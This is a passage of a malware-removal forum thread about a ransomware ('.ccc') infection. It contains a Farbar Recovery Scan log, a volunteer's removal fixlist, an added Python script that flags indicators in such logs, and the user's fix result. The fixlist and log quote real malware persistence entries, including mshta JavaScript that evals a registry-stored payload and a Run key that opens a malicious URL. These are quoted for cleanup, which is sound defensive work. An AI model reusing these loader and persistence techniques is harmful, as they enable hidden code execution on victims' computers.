2015-11-09 18:37 - 2011-12-30 00:17 - 00000000 __SHD C:\ProgramData\SecuROM
2015-11-09 18:37 - 2011-12-28 03:46 - 00000000 ____D C:\Users\KW\AppData\Local\2K Games
2015-11-09 18:37 - 2011-12-27 21:27 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-11-09 18:37 - 2011-12-15 15:07 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2015-11-09 18:36 - 2015-08-26 20:45 - 00000000 ____D C:\Qoobox
2015-11-09 18:36 - 2015-06-30 04:07 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-11-09 18:36 - 2015-03-01 03:30 - 00000000 ____D C:\ProgramData\Garena
2015-11-09 18:36 - 2014-11-11 20:53 - 00000000 ____D C:\ProgramData\Auslogics
2015-11-09 18:36 - 2013-09-07 19:21 - 00000000 ____D C:\ProgramData\Cisco Systems
2015-11-09 18:36 - 2013-05-18 00:05 - 00000000 ____D C:\ProgramData\ClubSanDisk
2015-11-09 18:36 - 2012-11-26 02:56 - 00000000 ____D C:\ProgramData\Apple Computer
2015-11-09 18:36 - 2012-11-26 02:55 - 00000000 ____D C:\ProgramData\Apple
2015-11-09 18:36 - 2012-04-27 17:09 - 00000000 ____D C:\ProgramData\Digidesign
2015-11-09 18:36 - 2012-04-27 17:04 - 00000000 ____D C:\ProgramData\DigiDriver
2015-11-09 18:36 - 2012-03-16 14:12 - 00000000 ____D C:\ProgramData\Electronic Arts
2015-11-09 18:36 - 2012-02-20 17:02 - 00000000 ____D C:\ProgramData\3DMGAME
2015-11-09 18:36 - 2012-02-16 19:27 - 00000000 ____D C:\ProgramData\Adobe
2015-11-09 18:36 - 2011-12-29 18:38 - 00000000 __SHD C:\ProgramData\DSS
2015-11-09 18:36 - 2011-12-15 16:40 - 00000000 ____D C:\Sysprep
2015-11-09 18:05 - 2014-08-12 15:02 - 00000000 ___RD C:\Users\KW\Downloads\Movies
2015-11-04 20:03 - 2015-09-05 02:08 - 00000000 ___HD C:\Windows\msdownld.tmp
2015-11-04 20:03 - 2012-02-20 15:50 - 00000000 ____D C:\Windows\SysWOW64\directx
2015-11-04 18:25 - 2012-08-30 19:36 - 00000000 ____D C:\Users\KW\Downloads\Games
2015-10-31 18:05 - 2014-12-24 17:01 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-10-23 21:41 - 2014-12-28 00:01 - 00104379 _____ C:\Windows\DirectX.log
2015-10-23 00:04 - 2012-09-11 01:49 - 00002189 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-10-21 15:18 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\rescache
2015-10-17 22:16 - 2015-03-01 03:04 - 00000000 ____D C:\Program Files (x86)\Steam
2015-10-17 20:21 - 2009-07-13 23:08 - 00032630 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-10-15 15:23 - 2014-12-16 23:24 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-10-15 00:17 - 2014-12-10 05:28 - 00000000 ____D C:\Windows\system32\appraiser
2015-10-15 00:17 - 2014-05-05 17:39 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-10-14 12:25 - 2014-10-27 22:09 - 00000000 ____D C:\Windows\system32\MRT
2015-10-14 12:20 - 2012-09-20 00:15 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-10-14 12:20 - 2011-04-06 13:08 - 143481208 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-10-14 12:18 - 2009-07-13 20:34 - 00000478 _____ C:\Windows\win.ini
2015-10-13 15:36 - 2014-11-18 23:05 - 00024474 _____ C:\Windows\PFRO.log

==================== Files in the root of some directories =======

2013-02-16 21:27 - 2013-02-16 21:27 - 2174976 _____ (Advanced Micro Devices Inc.) C:\Program Files (x86)\Common Files\atimpenc.dll
2014-09-01 02:18 - 2014-09-01 02:18 - 0001248 _____ () C:\Users\KW\AppData\Roaming\DZZPF
2014-09-01 02:18 - 2014-09-01 02:18 - 0001248 _____ () C:\Users\KW\AppData\Roaming\FECWQT
2015-11-09 20:16 - 2015-11-09 20:16 - 0005701 _____ () C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 0002561 _____ () C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
2014-09-01 02:18 - 2014-09-01 02:18 - 0002086 _____ () C:\Users\KW\AppData\Roaming\IJFXTJV
2015-11-09 18:29 - 2015-11-09 18:29 - 0466944 _____ () C:\Users\KW\AppData\Roaming\popry-a.exe
2014-09-01 02:18 - 2014-09-01 02:18 - 0002086 _____ () C:\Users\KW\AppData\Roaming\SXQHCMK
2015-11-09 18:37 - 2015-11-09 20:12 - 0005701 _____ () C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 20:12 - 0002561 _____ () C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:37 - 0005701 _____ () C:\ProgramData\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:37 - 0002561 _____ () C:\ProgramData\howto_recover_file_mbeso.txt
2015-11-09 18:30 - 2015-11-09 18:30 - 0004096 _____ () C:\ProgramData\igfxCUIService.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 0004096 _____ () C:\ProgramData\IntelCpHeciSvc.dll

Files to move or delete:
====================
C:\ProgramData\igfxCUIService.exe
C:\ProgramData\IntelCpHeciSvc.dll
C:\Users\KW\nsrulzde.exe

Some files in TEMP:
====================
C:\Users\KW\AppData\Local\Temp\bitool.dll
C:\Users\KW\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\KW\AppData\Local\Temp\nvStInst.exe
C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-10-31 14:39

==================== End of FRST.txt ============================

 

A couple of last things. My desktop wallpaper is just grey now. I had seen this before but only sometimes when I started my computer and it would go back to my original wallpaper in about a minute. Also a black command prompt screen with nothing in it will flash a couple of times as the desktop starts up. On the top it says c:\users\kw\appdata\roaming\popry-4.exe. This, like the grey screen, has been happening for months before this ransomware popped up. I will also try to attach the addition.txt file but it looks encrypted now.

 

Edit: I'm sorry I accidentally posted the thread three times. I don't know how to delete the other two. Also I just wanna say I'd appreciate any help you can give. Thanks.

Edited by snapjaw, 10 November 2015 - 12:59 PM.




#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 12 November 2015 - 11:37 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Unless you pay to restore your files nothing can be suggested that would restore them.
I certainly would not pay and I would not trust them.
Your call

If you have a good backup of your files you can restore them after the fix suggested below.

The following fix will remove all registry entries, folders, files that were installed by the infection.
If you wish to go this route please proceed.

Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Users\KW\AppData\Roaming\popry-a.exe
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]
Task: {4811701C-FA0B-475F-BC94-B931A8442A1C} - System32\Tasks\IJFXTJV => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {62D75B3F-795C-40D3-83BE-45B8F4101BCF} - System32\Tasks\SXQHCMK => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
Task: {6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B} - System32\Tasks\DZZPF => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: {7009D75B-6D4C-4599-9BFF-9189E5E3A946} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {958954B3-7CA1-4897-9FBD-CDC081C1F5B6} - System32\Tasks\FECWQT => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: {A911910C-5B46-492B-8E9B-A5C37E9BE803} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {B8687491-B4A9-4E61-B701-C84380BEB419} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: C:\Windows\Tasks\DZZPF.job => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: C:\Windows\Tasks\FECWQT.job => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: C:\Windows\Tasks\IJFXTJV.job => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: C:\Windows\Tasks\SXQHCMK.job => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\ProgramData\Microsoft:1JUrhqBxzVBn2oXHbF3idLRjdaK
AlternateDataStreams: C:\ProgramData\Microsoft:Bw0yU4h7WSa9zkLTBQbP
AlternateDataStreams: C:\ProgramData\Microsoft:er7Z6YcKSZpsAnbNiAs9nu4Y
AlternateDataStreams: C:\Users\KW\Cookies:8Cf9Q91WWNGZLUUlFb4AQuDRHLBm
AlternateDataStreams: C:\Users\KW\Cookies:Ni6hbrdQGoIWWA8FzMivntYD
AlternateDataStreams: C:\Users\KW\Local Settings:init
AlternateDataStreams: C:\Users\KW\AppData\Local:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Application Data:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Temporary Internet Files:puluywQBOvJITXRnmnlZvT
C:\Users\KW\AppData\Roaming\IJFXTJV.exe
C:\Users\KW\AppData\Local\Temp\launchie.vbs
C:\Users\KW\AppData\Roaming\SXQHCMK.exe
C:\Users\KW\AppData\Roaming\DZZPF.exe
C:\Users\KW\AppData\Roaming\FECWQT.exe
C:\Windows\SysWOW64\C2MP
C:\Users\KW\AppData\Roaming\popry-a.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt
C:\Users\KW\Documents\howto_recover_file_mbeso.html
C:\Users\KW\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\ProgramData\howto_recover_file_mbeso.txt
C:\Users\Public\Documents\howto_recover_file_mbeso.html
C:\Users\Public\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\Users\KW\nsrulzde.exe
C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Let me know what problem persists.
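Building a fixlist like the one above starts with picking the indicators out of the FRST log: files that gained the .ccc suffix, the howto_recover_file_mbeso.txt/.html notes dropped into many folders, unattributed executables under AppData\Roaming, Run keys that launch mshta with inline JavaScript, and scheduled tasks FRST already marked ATTENTION. The script below is an added example written for this thread; it is not part of FRST, and neither nasdaq nor Farbar provide it. It parses the FRST "Files in the root of some directories" line format, Run-key lines and Task lines, and flags those indicators. The sample lines are copied from the log and fixlist posted in this thread; the regexes, the Finding record and the category names are my own assumptions about what a responder would want to count first.

```python
"""Triage an FRST log for ransomware indicators (added example, not an FRST feature)."""
import re
from collections import Counter
from dataclasses import dataclass

# Indicators seen in this thread: encrypted files gain a ".ccc" suffix and
# ransom notes are dropped as howto_recover_file_<id>.txt/.html in many folders.
ENCRYPTED_EXT = ".ccc"
RANSOM_NOTE_RE = re.compile(r"howto_recover_file_[a-z0-9]+\.(?:txt|html)$", re.IGNORECASE)
# Autostart entries that launch a script host with an inline or on-disk script.
SCRIPT_HOST_RE = re.compile(r"\b(?:mshta|wscript|cscript)\b.*(?:javascript:|\.vbs)", re.IGNORECASE)
# Executables living in user-writable profile folders (assumed heuristic).
USER_DIR_EXE_RE = re.compile(r"\\AppData\\(?:Roaming|Local\\Temp)\\[^\\\s]+\.exe\b", re.IGNORECASE)

# FRST file line: "<modified> - <created> - <size> <attrs> [(company)] <path>"
FRST_FILE_LINE = re.compile(
    r"^\d{4}-\d\d-\d\d \d\d:\d\d - \d{4}-\d\d-\d\d \d\d:\d\d - "
    r"(?P<size>\d+) (?P<attrs>\S+) (?:\((?P<company>[^)]*)\) )?(?P<path>.+)$"
)


@dataclass(frozen=True)
class Finding:
    kind: str     # indicator category
    target: str   # file path or autostart target
    line: str     # the log line that produced it


def classify(line):
    """Return a Finding for one FRST log line, or None if nothing stands out."""
    line = line.strip()
    m = FRST_FILE_LINE.match(line)
    if m:
        path = m.group("path")
        if path.lower().endswith(ENCRYPTED_EXT):
            return Finding("encrypted_file", path, line)
        if RANSOM_NOTE_RE.search(path):
            return Finding("ransom_note", path, line)
        # FRST prints "()" when the binary carries no company name; an
        # unattributed .exe in Roaming or Temp is worth a second look.
        if USER_DIR_EXE_RE.search(path) and not m.group("company"):
            return Finding("exe_in_user_dir", path, line)
        return None
    if line.startswith("Task:"):
        if "<==== ATTENTION" in line:
            target = line.split(" - ", 1)[-1].split("<====", 1)[0].strip()
            return Finding("flagged_task", target, line)
        return None
    if "\\Run:" in line:
        target = line.split("=>", 1)[-1].strip()
        if SCRIPT_HOST_RE.search(target):
            return Finding("script_host_autorun", target, line)
        if USER_DIR_EXE_RE.search(target):
            return Finding("autorun_from_user_dir", target, line)
    return None


def triage(lines):
    """Classify every line and keep only the ones with something to report."""
    return [f for f in (classify(l) for l in lines) if f is not None]


def summarize(findings):
    """Count findings per category, e.g. {'encrypted_file': 2, ...}."""
    return dict(Counter(f.kind for f in findings))


# Sample input: lines copied from the FRST log and fixlist in this thread.
SAMPLE_LINES = [
    r"2015-11-09 20:16 - 2015-08-26 20:27 - 00002798 _____ C:\Users\KW\Desktop\Rkill.txt.ccc",
    r"2015-11-09 20:16 - 2013-04-30 18:27 - 00021918 _____ C:\Users\KW\Desktop\Research Proposal FINAL.docx.ccc",
    r"2015-11-09 20:16 - 2015-11-09 20:16 - 0005701 _____ () C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html",
    r"2015-11-09 18:29 - 2015-11-09 18:29 - 0466944 _____ () C:\Users\KW\AppData\Roaming\popry-a.exe",
    r"2015-10-14 12:20 - 2011-04-06 13:08 - 143481208 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe",
    r"2015-11-09 20:19 - 2015-02-28 01:36 - 00000000 ____D C:\Users\KW\Documents\Tunngle",
    r'HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)',
    r"HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()",
    r"Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION",
    r"Task: {7009D75B-6D4C-4599-9BFF-9189E5E3A946} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION",
]

if __name__ == "__main__":
    results = triage(SAMPLE_LINES)
    for f in results:
        print(f"{f.kind:24} {f.target}")
    print(summarize(results))
```

Feeding a whole FRST.txt through `triage(open(path, encoding="utf-8", errors="replace"))` gives the same categories across the full log; the counts in `summarize` tell you quickly how many files carry the encrypted suffix and where the persistence entries are, which is what the fixlist then has to cover. The ".ccc" suffix and note name are specific to the family in this thread, so swap those two constants when using the script against a different log.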

#3 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE

Posted 12 November 2015 - 04:12 PM

It didn't really change anything. Only difference is that I can get to task manager now. Oh and I noticed before I ran FRST that picture files are encrypted as well. Here is the fix log.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:07-11-2015
Ran by KW (2015-11-12 14:38:46) Run:1
Running from C:\Users\KW\Desktop
Loaded Profiles: KW (Available Profiles: KW)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Users\KW\AppData\Roaming\popry-a.exe
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]
Task: {4811701C-FA0B-475F-BC94-B931A8442A1C} - System32\Tasks\IJFXTJV => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {62D75B3F-795C-40D3-83BE-45B8F4101BCF} - System32\Tasks\SXQHCMK => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
Task: {6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B} - System32\Tasks\DZZPF => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: {7009D75B-6D4C-4599-9BFF-9189E5E3A946} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
Task: {958954B3-7CA1-4897-9FBD-CDC081C1F5B6} - System32\Tasks\FECWQT => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: {A911910C-5B46-492B-8E9B-A5C37E9BE803} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {B8687491-B4A9-4E61-B701-C84380BEB419} - \AdobeFlashPlayerUpdate 2 -> No File <==== ATTENTION
Task: C:\Windows\Tasks\DZZPF.job => C:\Users\KW\AppData\Roaming\DZZPF.exe <==== ATTENTION
Task: C:\Windows\Tasks\FECWQT.job => C:\Users\KW\AppData\Roaming\FECWQT.exe <==== ATTENTION
Task: C:\Windows\Tasks\IJFXTJV.job => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
Task: C:\Windows\Tasks\SXQHCMK.job => C:\Users\KW\AppData\Roaming\SXQHCMK.exe <==== ATTENTION
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\ProgramData\Microsoft:1JUrhqBxzVBn2oXHbF3idLRjdaK
AlternateDataStreams: C:\ProgramData\Microsoft:Bw0yU4h7WSa9zkLTBQbP
